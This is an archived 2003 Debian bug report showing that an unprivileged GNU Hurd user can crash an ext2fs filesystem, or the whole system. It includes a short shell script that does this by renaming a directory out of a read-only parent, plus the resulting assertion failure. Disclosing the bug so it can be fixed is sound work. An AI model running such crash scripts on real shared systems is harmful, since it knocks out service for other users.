[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Bug#190732: hurd: non-priviledged user may crash filesystem
|
From: |
Robert Millan |
|
Subject: |
Bug#190732: hurd: non-priviledged user may crash filesystem |
|
Date: |
Fri, 25 Apr 2003 14:04:47 +0200 |
Package: hurd
Version: 20021118-2
Severity: critical
by exploiting this bug, a non-priviledged user is able to crash
a filesystem on which he/she has read/write access to. if that
filesystem is /, then is able to crash the whole system.
test log:
$ dd if=/dev/zero of=./fs ibs=32k count=10 ; mke2fs -o hurd ./fs
[...]
$ settrans -cafg ./mnt /hurd/ext2fs ./fs
$ cat cbtf
#!/bin/sh -x
# crashes the filesystem on which it is being run.
# (caution: if that filesystem is /, crashes the system)
rm -rf no-write dir
mkdir -p no-write/dir
chmod 555 no-write
mv no-write/dir .
$ ./cbtf
+ rm -rf no-write dir
+ mkdir -p no-write/dir
+ chmod 555 no-write
+ mv no-write/dir .
ext2fs: ../../libdiskfs/dir_renamed.c: 202: diskfs_rename_dir: Assertion `tmpnp
= fnp' failed.
mv: cannot move `no_write/dir' to `./dir': Computer bought the farm
-- System Information:
Debian Release: testing/unstable
Architecture: hurd-i386
Kernel: GNU aragorn 0.3 GNUmach-1.2/Hurd-0.3 i386-AT386
Locale: LANG=C, LC_CTYPE=C
Versions of packages hurd depends on:
ii libc0.3 2.3.1-5 GNU C Library: Shared libraries an
ii libncursesw5 5.2.20020112a-8 Shared libraries for terminal hand
-- no debconf information
| [Prev in Thread] |
Current Thread |
[Next in Thread] |
- Bug#190732: hurd: non-priviledged user may crash filesystem,
Robert Millan <=